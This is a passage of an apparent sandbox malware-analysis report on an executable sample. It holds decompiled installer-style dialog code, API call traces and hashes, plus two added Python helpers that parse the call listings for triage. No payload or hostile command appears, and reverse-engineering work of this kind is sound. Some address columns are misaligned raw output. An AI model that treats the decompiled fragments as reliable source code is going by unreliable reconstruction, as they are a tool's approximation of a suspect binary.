                                                                                    				if(E0040579B(_t88, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
                                                                                    					L16:
                                                                                    					if(E0040579B(_t96, _t84) == 0) {
                                                                                    						E00405BE9(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
                                                                                    					}
                                                                                    					_t28 = LoadImageA( *0x42ec20, 0x67, 1, 0, 0, 0x8040);
                                                                                    					 *0x42e408 = _t28;
                                                                                    					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
                                                                                    						L21:
                                                                                    						if(E0040140B(0) == 0) {
                                                                                    							_t30 = E004038E3(_t76, __eflags);
                                                                                    							__eflags =  *0x42ecc0;
                                                                                    							if( *0x42ecc0 != 0) {
                                                                                    								_t31 = E00404F85(_t30, 0);
                                                                                    								__eflags = _t31;
                                                                                    								if(_t31 == 0) {
                                                                                    									E0040140B(1);
                                                                                    									goto L33;
                                                                                    								}
                                                                                    								__eflags =  *0x42e3ec;
                                                                                    								if( *0x42e3ec == 0) {
                                                                                    									E0040140B(2);
                                                                                    								}
                                                                                    								goto L22;
                                                                                    							}
                                                                                    							ShowWindow( *0x42a078, 5);
                                                                                    							_t37 = E00405EE9("RichEd20");
                                                                                    							__eflags = _t37;
                                                                                    							if(_t37 == 0) {
                                                                                    								E00405EE9("RichEd32");
                                                                                    							}
                                                                                    							_t85 = "RichEdit20A";
                                                                                    							_t38 = GetClassInfoA(0, _t85, 0x42e3c0);
                                                                                    							__eflags = _t38;
                                                                                    							if(_t38 == 0) {
                                                                                    								GetClassInfoA(0, "RichEdit", 0x42e3c0);
                                                                                    								 *0x42e3e4 = _t85;
                                                                                    								RegisterClassA(0x42e3c0);
                                                                                    							}
                                                                                    							_t42 = DialogBoxParamA( *0x42ec20,  *0x42e400 + 0x00000069 & 0x0000ffff, 0, E004039B0, 0);
                                                                                    							E0040356A(E0040140B(5), 1);
                                                                                    							return _t42;
                                                                                    						}
                                                                                    						L22:
                                                                                    						_t34 = 2;
                                                                                    						return _t34;
                                                                                    					} else {
                                                                                    						_t76 =  *0x42ec20;
                                                                                    						 *0x42e3d4 = _t28;
                                                                                    						_v20 = 0x624e5f;
                                                                                    						 *0x42e3c4 = E00401000;
                                                                                    						 *0x42e3d0 =  *0x42ec20;
                                                                                    						 *0x42e3e4 =  &_v20;
                                                                                    						if(RegisterClassA(0x42e3c0) == 0) {
                                                                                    							L33:
                                                                                    							__eflags = 0;
                                                                                    							return 0;
                                                                                    						}
                                                                                    						_t12 =  &_v16; // 0x624e5f
                                                                                    						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                                                    						 *0x42a078 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42ec20, 0);
                                                                                    						goto L21;
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t76 =  *(_t81 + 0x48);
                                                                                    					if(_t76 == 0) {
                                                                                    						goto L16;
                                                                                    					}
                                                                                    					_t79 = 0x42dbc0;
                                                                                    					E00405AAE( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x42ec58, 0x42dbc0, 0);
                                                                                    					_t62 =  *0x42dbc0; // 0x46
                                                                                    					if(_t62 == 0) {
                                                                                    						goto L16;
                                                                                    					}
                                                                                    					if(_t62 == 0x22) {
                                                                                    						_t79 = 0x42dbc1;
                                                                                    						 *((char*)(E004056E5(0x42dbc1, 0x22))) = 0;
                                                                                    					}
                                                                                    					_t64 = lstrlenA(_t79) + _t79 - 4;
                                                                                    					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
                                                                                    						L15:
                                                                                    						E00405BC7(_t84, E004056BA(_t79));
                                                                                    						goto L16;
                                                                                    					} else {
                                                                                    						_t68 = GetFileAttributesA(_t79);
                                                                                    						if(_t68 == 0xffffffff) {
                                                                                    							L14:
                                                                                    							E00405701(_t79);
                                                                                    							goto L15;
                                                                                    						}
                                                                                    						_t96 = _t68 & 0x00000010;
                                                                                    						if((_t68 & 0x00000010) != 0) {
                                                                                    							goto L15;
                                                                                    						}
                                                                                    						goto L14;
                                                                                    					}
                                                                                    				}
                                                                                    			}
                                                                                    0x00403620
                                                                                    0x00403629
                                                                                    0x00403630
                                                                                    0x00403632
                                                                                    0x00403646
                                                                                    0x00403658
                                                                                    0x00403662
                                                                                    0x00403667
                                                                                    0x0040366d
                                                                                    0x00403680
                                                                                    0x00403680
                                                                                    0x0040368b
                                                                                    0x00403634
                                                                                    0x0040363f
                                                                                    0x0040363f
                                                                                    0x00403690
                                                                                    0x0040369a
                                                                                    0x004036a3
                                                                                    0x004036a8
                                                                                    0x004036b9
                                                                                    0x00403740
                                                                                    0x00403748
                                                                                    0x00403751
                                                                                    0x00403751
                                                                                    0x00403767
                                                                                    0x0040376d
                                                                                    0x0040377b
                                                                                    0x0040380a
                                                                                    0x00403812
                                                                                    0x0040381c
                                                                                    0x00403821
                                                                                    0x00403827
                                                                                    0x004038b1
                                                                                    0x004038b6
                                                                                    0x004038b8
                                                                                    0x004038d4
                                                                                    0x00000000
                                                                                    0x004038d4
                                                                                    0x004038ba
                                                                                    0x004038c0
                                                                                    0x004038c8
                                                                                    0x004038c8
                                                                                    0x00000000
                                                                                    0x004038c0
                                                                                    0x00403835
                                                                                    0x00403840
                                                                                    0x00403845
                                                                                    0x00403847
                                                                                    0x0040384e
                                                                                    0x0040384e
                                                                                    0x00403859
                                                                                    0x00403861
                                                                                    0x00403863
                                                                                    0x00403865
                                                                                    0x0040386e
                                                                                    0x00403871
                                                                                    0x00403877
                                                                                    0x00403877
                                                                                    0x00403896
                                                                                    0x004038a7
                                                                                    0x00000000
                                                                                    0x004038ac
                                                                                    0x00403814
                                                                                    0x00403816
                                                                                    0x00000000
                                                                                    0x00403781
                                                                                    0x00403781
                                                                                    0x00403787
                                                                                    0x00403791
                                                                                    0x00403799
                                                                                    0x004037a3
                                                                                    0x004037a9
                                                                                    0x004037b7
                                                                                    0x004038d9
                                                                                    0x004038d9
                                                                                    0x00000000
                                                                                    0x004038d9
                                                                                    0x004037bd
                                                                                    0x004037c6
                                                                                    0x00403805
                                                                                    0x00000000
                                                                                    0x00403805
                                                                                    0x004036bf
                                                                                    0x004036bf
                                                                                    0x004036c4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004036ce
                                                                                    0x004036de
                                                                                    0x004036e3
                                                                                    0x004036ea
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004036ee
                                                                                    0x004036f0
                                                                                    0x004036fd
                                                                                    0x004036fd
                                                                                    0x00403705
                                                                                    0x0040370b
                                                                                    0x00403733
                                                                                    0x0040373b
                                                                                    0x00000000
                                                                                    0x0040371d
                                                                                    0x0040371e
                                                                                    0x00403727
                                                                                    0x0040372d
                                                                                    0x0040372e
                                                                                    0x00000000
                                                                                    0x0040372e
                                                                                    0x00403729
                                                                                    0x0040372b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040372b
                                                                                    0x0040370b

                                                                                    APIs
                                                                                      • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                      • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                    • lstrcatA.KERNEL32(1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,00000000), ref: 0040368B
                                                                                    • lstrlenA.KERNEL32(Fdskdfkdsfsdfdsf,?,?,?,Fdskdfkdsfsdfdsf,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 00403700
                                                                                    • lstrcmpiA.KERNEL32(?,.exe,Fdskdfkdsfsdfdsf,?,?,?,Fdskdfkdsfsdfdsf,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000), ref: 00403713
                                                                                    • GetFileAttributesA.KERNEL32(Fdskdfkdsfsdfdsf), ref: 0040371E
                                                                                    • LoadImageA.USER32 ref: 00403767
                                                                                      • Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32
                                                                                    • RegisterClassA.USER32 ref: 004037AE
                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
                                                                                    • CreateWindowExA.USER32 ref: 004037FF
                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403835
                                                                                    • GetClassInfoA.USER32 ref: 00403861
                                                                                    • GetClassInfoA.USER32 ref: 0040386E
                                                                                    • RegisterClassA.USER32 ref: 00403877
                                                                                    • DialogBoxParamA.USER32 ref: 00403896
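The API list above is the raw call trace the sandbox recorded for this function: one line per call site, with the API name, the exporting module, the argument values it could recover ("?" where it could not), and the address of the call in the dumped image; calls made inside a callee are prefixed with "Part of subcall function". When triaging many reports it is useful to turn these lines into structured records so the call order and the string literals can be pulled out mechanically. The parser below is an added example written for this page, not code from the report or from the sandbox vendor. It assumes only the line shapes visible in this listing (bullet, optional subcall prefix, optional parenthesised argument list, trailing "ref:" address) and that arguments never contain a bare comma, which holds for every argument shown here. The five sample lines are copied from the listing above; the names ApiCall, parse_api_listing, call_chain and literal_strings are my own.

```python
"""Parser for sandbox API call listings (added example, not part of the report)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple, Union

Arg = Union[int, str, None]

# One listing line:  "• api.MODULE(arg,arg,...), ref: ADDR"
# or, for calls made inside a callee:
#   "• Part of subcall function ADDR: api.MODULE(...), ref: ADDR"
# The argument list is optional; the report omits it for some calls.
_LINE_RE = re.compile(
    r"^\s*•?\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[Arg, ...]
    ref: int                    # address of the call site in the dumped image
    subcall_of: Optional[int]   # callee address when the report marks it as a subcall


def _decode_arg(tok: str) -> Arg:
    """'?' -> None (unrecovered), 8 hex digits -> int, anything else -> literal string."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one listing line; returns None for headings and anything else that is not a call."""
    m = _LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    # Assumption: the report joins arguments with bare commas and none of its strings contain one.
    args = tuple(_decode_arg(t) for t in raw.split(",")) if raw else ()
    sub = m.group("sub")
    return ApiCall(
        api=m.group("api"),
        module=m.group("module"),
        args=args,
        ref=int(m.group("ref"), 16),
        subcall_of=int(sub, 16) if sub else None,
    )


def parse_api_listing(text: str) -> List[ApiCall]:
    """Parse every recognisable call line in a block of report text."""
    calls = []
    for line in text.splitlines():
        c = parse_api_line(line)
        if c:
            calls.append(c)
    return calls


def call_chain(calls: List[ApiCall]) -> List[str]:
    """API names of the function's own calls (subcalls excluded), ordered by call-site address."""
    own = [c for c in calls if c.subcall_of is None]
    return [c.api for c in sorted(own, key=lambda c: c.ref)]


def literal_strings(calls: List[ApiCall]) -> List[str]:
    """Distinct string arguments seen anywhere in the trace (registry paths, class names, file names)."""
    found = {a for c in calls for a in c.args if isinstance(a, str)}
    return sorted(found)


# Constructed sample: five lines copied from the "APIs" block of this function above.
SAMPLE_LISTING = r"""
APIs
  • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
• lstrcmpiA.KERNEL32(?,.exe,Fdskdfkdsfsdfdsf,?,?,?,Fdskdfkdsfsdfdsf,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000), ref: 00403713
• GetFileAttributesA.KERNEL32(Fdskdfkdsfsdfdsf), ref: 0040371E
• LoadImageA.USER32 ref: 00403767
• SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
"""

if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE_LISTING)
    print("call order:", " -> ".join(call_chain(parsed)))
    print("strings:", literal_strings(parsed))
```

Sorting by the ref address rather than keeping listing order matters because the report groups subcall lines at the top; for the function's own calls the address order is the order the code reaches them along a straight path, which is what you compare against the decompiled control flow.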
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: "C:\Users\user\Desktop\Nz7NA3F7z7.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Fdskdfkdsfsdfdsf$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                    • API String ID: 1975747703-348240990
                                                                                    • Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                                                                    • Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
                                                                                    • Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
                                                                                    • Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 92%
                                                                                    			E00403FCB(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                                    				char* _v8;
                                                                                    				signed int _v12;
                                                                                    				void* _v16;
                                                                                    				struct HWND__* _t52;
                                                                                    				long _t86;
                                                                                    				int _t98;
                                                                                    				struct HWND__* _t99;
                                                                                    				signed int _t100;
                                                                                    				intOrPtr _t109;
                                                                                    				int _t110;
                                                                                    				signed int* _t112;
                                                                                    				signed int _t113;
                                                                                    				char* _t114;
                                                                                    				CHAR* _t115;
                                                                                    
                                                                                    				if(_a8 != 0x110) {                                  /* 0x110 = WM_INITDIALOG */
                                                                                    					if(_a8 != 0x111) {                              /* 0x111 = WM_COMMAND */
                                                                                    						L11:
                                                                                    						if(_a8 != 0x4e) {                           /* 0x4e = WM_NOTIFY */
                                                                                    							if(_a8 == 0x40b) {                      /* 0x40b = WM_USER+0xb, a private message: bumps the global counter that gates the WM_COMMAND path */
                                                                                    								 *0x42a080 =  *0x42a080 + 1;
                                                                                    							}
                                                                                    							L25:
                                                                                    							_t110 = _a16;
                                                                                    							L26:
                                                                                    							return E00403EEA(_a8, _a12, _t110);
                                                                                    						}
                                                                                    						_t52 = GetDlgItem(_a4, 0x3e8);              /* control ID 1000: the RichEdit control configured under WM_INITDIALOG */
                                                                                    						_t110 = _a16;                               /* lParam: NMHDR-headed notification (ENLINK / MSGFILTER layout) */
                                                                                    						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) { /* nmhdr.code == EN_LINK && msg == WM_LBUTTONDOWN: a link was clicked */
                                                                                    							_t100 =  *((intOrPtr*)(_t110 + 0x1c)); /* ENLINK.chrg.cpMax */
                                                                                    							_t109 =  *((intOrPtr*)(_t110 + 0x18)); /* ENLINK.chrg.cpMin */
                                                                                    							_v12 = _t100;                           /* TEXTRANGE.chrg.cpMax */
                                                                                    							_v16 = _t109;                           /* TEXTRANGE.chrg.cpMin */
                                                                                    							_v8 = 0x42dbc0;                         /* TEXTRANGE.lpstrText: fixed global buffer */
                                                                                    							if(_t100 - _t109 < 0x800) {             /* only copy links that fit the 0x800-byte buffer */
                                                                                    								SendMessageA(_t52, 0x44b, 0,  &_v16); /* EM_GETTEXTRANGE: copy the clicked link text to 0x42dbc0 */
                                                                                    								SetCursor(LoadCursorA(0, 0x7f02));  /* IDC_WAIT */
                                                                                    								ShellExecuteA(_a4, "open", _v8, 0, 0, 1); /* hand the link text to the shell's default "open" handler, SW_SHOWNORMAL */
                                                                                    								SetCursor(LoadCursorA(0, 0x7f00));  /* IDC_ARROW */
                                                                                    								_t110 = _a16;
                                                                                    							}
                                                                                    						}
                                                                                    						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) { /* anything but EN_MSGFILTER carrying WM_KEYDOWN */
                                                                                    							goto L26;
                                                                                    						} else {
                                                                                    							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {      /* MSGFILTER.wParam == VK_RETURN */
                                                                                    								SendMessageA( *0x42ec28, 0x111, 1, 0);      /* WM_COMMAND, IDOK, to the window handle held in the global */
                                                                                    							}
                                                                                    							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {     /* VK_ESCAPE */
                                                                                    								SendMessageA( *0x42ec28, 0x10, 0, 0);       /* WM_CLOSE */
                                                                                    							}
                                                                                    							return 1;
                                                                                    						}
                                                                                    					}
                                                                                    					if(_a12 >> 0x10 != 0 ||  *0x42a080 != 0) {
                                                                                    						goto L25;
                                                                                    					} else {
                                                                                    						_t112 =  *0x429870 + 0x14;
                                                                                    						if(( *_t112 & 0x00000020) == 0) {
                                                                                    							goto L25;
                                                                                    						}
                                                                                    						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001; /* BM_GETCHECK on control ID 1034: store the checkbox state in bit 0 */
                                                                                    						E00403EA5(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                    						E00404256();
                                                                                    						goto L11;
                                                                                    					}
                                                                                    				}
                                                                                    				_t98 = _a16;
                                                                                    				_t113 =  *(_t98 + 0x30);
                                                                                    				if(_t113 < 0) {
                                                                                    					_t113 =  *( *0x42e3fc - 4 + _t113 * 4);
                                                                                    				}
                                                                                    				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                                    				_t114 = _t113 +  *0x42ec58;
                                                                                    				_push(0x22);
                                                                                    				_a16 =  *_t114;
                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                    				_t115 = _t114 + 1;
                                                                                    				_v16 = _t115;
                                                                                    				_v8 = E00403F97;
                                                                                    				E00403E83(_a4);
                                                                                    				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                                    				_push(0x23);
                                                                                    				E00403E83(_a4);
                                                                                    				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                    				E00403EA5( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                                    				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                                    				E00403EB8(_t99);
                                                                                    				SendMessageA(_t99, 0x45b, 1, 0);                    /* EM_AUTOURLDETECT, TRUE: URLs in the text become clickable links */
                                                                                    				_t86 =  *( *0x42ec30 + 0x68);
                                                                                    				if(_t86 < 0) {
                                                                                    					_t86 = GetSysColor( ~_t86);                     /* a negative value encodes a system colour index */
                                                                                    				}
                                                                                    				SendMessageA(_t99, 0x443, 0, _t86);                 /* EM_SETBKGNDCOLOR */
                                                                                    				SendMessageA(_t99, 0x445, 0, 0x4010000);            /* EM_SETEVENTMASK, ENM_LINK | ENM_KEYEVENTS: enables the EN_LINK and EN_MSGFILTER notifications handled under WM_NOTIFY */
                                                                                    				 *0x429064 =  *0x429064 & 0x00000000;
                                                                                    				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));      /* EM_EXLIMITTEXT to the length of the text */
                                                                                    				SendMessageA(_t99, 0x449, _a16,  &_v16);            /* EM_STREAMIN: wParam = format flag read at _t114, lParam = EDITSTREAM { dwCookie = _t115, dwError = 0, pfnCallback = E00403F97 } */
                                                                                    				 *0x42a080 =  *0x42a080 & 0x00000000;
                                                                                    				return 0;
                                                                                    			}
                                                                                    Statement addresses (the report's per-line address column; its alignment with the listing above was lost in extraction)
                                                                                    0x00403fdb 0x00404101 0x0040415d 0x00404161 0x00404238 0x0040423a 0x0040423a 0x00404240 0x00404240 0x00404243
                                                                                    0x00000000 0x0040424a 0x0040416f 0x00404171 0x0040417b 0x00404186 0x00404189 0x0040418c 0x00404197 0x0040419a
                                                                                    0x004041a1 0x004041af 0x004041c7 0x004041da 0x004041ea 0x004041ec 0x004041ec 0x004041a1 0x004041f6 0x00000000
                                                                                    0x00404201 0x00404205 0x00404216 0x00404216 0x0040421c 0x0040422a 0x0040422a 0x00000000 0x0040422e 0x004041f6
                                                                                    0x0040410c 0x00000000 0x00404120 0x00404126 0x0040412c 0x00000000 0x00000000 0x00404151 0x00404153 0x00404158
                                                                                    0x00000000 0x00404158 0x0040410c 0x00403fe1 0x00403fe4 0x00403fe9 0x00403ffa 0x00403ffa 0x00404001 0x00404004
                                                                                    0x00404006 0x0040400b 0x00404014 0x0040401a 0x00404026 0x00404029 0x00404032 0x00404037 0x0040403a 0x0040403f
                                                                                    0x00404056 0x0040405d 0x00404070 0x00404073 0x00404088 0x0040408f 0x00404094 0x00404099 0x00404099 0x004040a8
                                                                                    0x004040b7 0x004040b9 0x004040cf 0x004040de 0x004040e0 0x00000000

                                                                                    APIs
                                                                                    • CheckDlgButton.USER32 ref: 00404056
                                                                                    • GetDlgItem.USER32 ref: 0040406A
                                                                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404088
                                                                                    • GetSysColor.USER32(?), ref: 00404099
                                                                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040A8
                                                                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040B7
                                                                                    • lstrlenA.KERNEL32(?), ref: 004040C1
                                                                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040CF
                                                                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040DE
                                                                                    • GetDlgItem.USER32 ref: 00404141
                                                                                    • SendMessageA.USER32(00000000), ref: 00404144
                                                                                    • GetDlgItem.USER32 ref: 0040416F
                                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041AF
                                                                                    • LoadCursorA.USER32 ref: 004041BE
                                                                                    • SetCursor.USER32(00000000), ref: 004041C7
                                                                                    • ShellExecuteA.SHELL32(0000070B,open,0042DBC0,00000000,00000000,00000001), ref: 004041DA
                                                                                    • LoadCursorA.USER32 ref: 004041E7
                                                                                    • SetCursor.USER32(00000000), ref: 004041EA
                                                                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404216
                                                                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040422A
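The APIs list above gives SendMessageA's message as a raw hex immediate, which is what makes the RichEdit configuration and the link-click handler hard to read at a glance. The following Python helper is an added example (mine, not part of the sandbox report or the analysed sample): it parses lines in the report's APIs format, names the Win32/RichEdit messages that occur in this function, and pulls out what ShellExecuteA is handed. The sample lines are copied verbatim from the APIs list of E00403FCB; the regex encodes my reading of that line format (an assumption), and the message values are the standard winuser.h/richedit.h constants. Where the sandbox captured fewer than four SendMessageA arguments (00404144, 00404216 and 0040422A, where the hWnd came from a global rather than a register), the message is left unresolved instead of being decoded positionally, since the surviving values would otherwise be mislabelled.

```python
"""Parse Joe Sandbox 'APIs' lines and name the messages passed to SendMessageA.

Added example, not the sandbox's or the sample's own code.  SAMPLE_LINES are
copied from the report's APIs list for E00403FCB; the line format the regex
expects is inferred from them (assumption); message values are SDK constants.
"""
import re
from typing import Optional

WM_USER = 0x400

# Standard winuser.h / richedit.h values for the messages seen in this function.
MSG_NAMES = {
    0x0010: "WM_CLOSE",
    0x004E: "WM_NOTIFY",
    0x00F0: "BM_GETCHECK",
    0x0110: "WM_INITDIALOG",
    0x0111: "WM_COMMAND",
    WM_USER + 53: "EM_EXLIMITTEXT",
    WM_USER + 67: "EM_SETBKGNDCOLOR",
    WM_USER + 69: "EM_SETEVENTMASK",
    WM_USER + 73: "EM_STREAMIN",
    WM_USER + 75: "EM_GETTEXTRANGE",
    WM_USER + 91: "EM_AUTOURLDETECT",
}

# "• Callee.MODULE(arg,arg,...), ref: 0040XXXX"  or  "• Callee.MODULE ref: 0040XXXX"
API_LINE = re.compile(
    r"(?:•\s*)?(?P<callee>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Constructed input: the APIs list of E00403FCB, copied from the report above.
SAMPLE_LINES = """\
• CheckDlgButton.USER32 ref: 00404056
• GetDlgItem.USER32 ref: 0040406A
• SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404088
• GetSysColor.USER32(?), ref: 00404099
• SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040A8
• SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040B7
• lstrlenA.KERNEL32(?), ref: 004040C1
• SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040CF
• SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040DE
• GetDlgItem.USER32 ref: 00404141
• SendMessageA.USER32(00000000), ref: 00404144
• GetDlgItem.USER32 ref: 0040416F
• SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041AF
• LoadCursorA.USER32 ref: 004041BE
• SetCursor.USER32(00000000), ref: 004041C7
• ShellExecuteA.SHELL32(0000070B,open,0042DBC0,00000000,00000000,00000001), ref: 004041DA
• LoadCursorA.USER32 ref: 004041E7
• SetCursor.USER32(00000000), ref: 004041EA
• SendMessageA.USER32(00000111,00000001,00000000), ref: 00404216
• SendMessageA.USER32(00000010,00000000,00000000), ref: 0040422A
""".splitlines()


def decode_arg(tok: str):
    """8 hex digits -> immediate; '?' -> unresolved (None); anything else -> string literal."""
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_api_line(line: str) -> Optional[dict]:
    """One APIs line -> {callee, module, args, ref, msg}; None if the line is not one."""
    m = API_LINE.search(line)
    if not m:
        return None
    raw = m.group("args")
    args = [decode_arg(t) for t in raw.split(",")] if raw is not None else []
    rec = {"callee": m.group("callee"), "module": m.group("module"),
           "args": args, "ref": int(m.group("ref"), 16), "msg": None}
    # SendMessageA(hWnd, uMsg, wParam, lParam): trust the uMsg slot only when all
    # four arguments were captured.  Lines with fewer values (hWnd loaded from a
    # global) would otherwise have their wParam mislabelled as the message.
    if rec["callee"] == "SendMessageA" and len(args) == 4 and isinstance(args[1], int):
        rec["msg"] = MSG_NAMES.get(args[1], f"0x{args[1]:x}")
    return rec


def parse_listing(lines):
    return [r for r in (parse_api_line(l) for l in lines) if r is not None]


def resolved_messages(records):
    """(ref, message name) for every SendMessageA whose uMsg slot is trustworthy."""
    return [(r["ref"], r["msg"]) for r in records if r["msg"] is not None]


def shell_execute_calls(records):
    """(ref, verb, file argument) for each ShellExecuteA: what the dialog hands the shell."""
    return [(r["ref"], r["args"][1], r["args"][2]) for r in records
            if r["callee"] == "ShellExecuteA" and len(r["args"]) >= 3]


if __name__ == "__main__":
    recs = parse_listing(SAMPLE_LINES)
    for ref, name in resolved_messages(recs):
        print(f"{ref:08x}  SendMessageA  {name}")
    for ref, verb, target in shell_execute_calls(recs):
        print(f"{ref:08x}  ShellExecuteA  verb={verb!r} file=0x{target:08x}")
```

Run stand-alone it lists the six RichEdit messages in the order the function sends them (EM_AUTOURLDETECT, EM_SETBKGNDCOLOR, EM_SETEVENTMASK, EM_EXLIMITTEXT, EM_STREAMIN, then EM_GETTEXTRANGE in the link handler) and the single ShellExecuteA("open", 0x42dbc0) call, which is the buffer EM_GETTEXTRANGE fills with the clicked link text. Extend MSG_NAMES as needed for other functions in the report; unknown messages are printed as hex rather than guessed.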
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
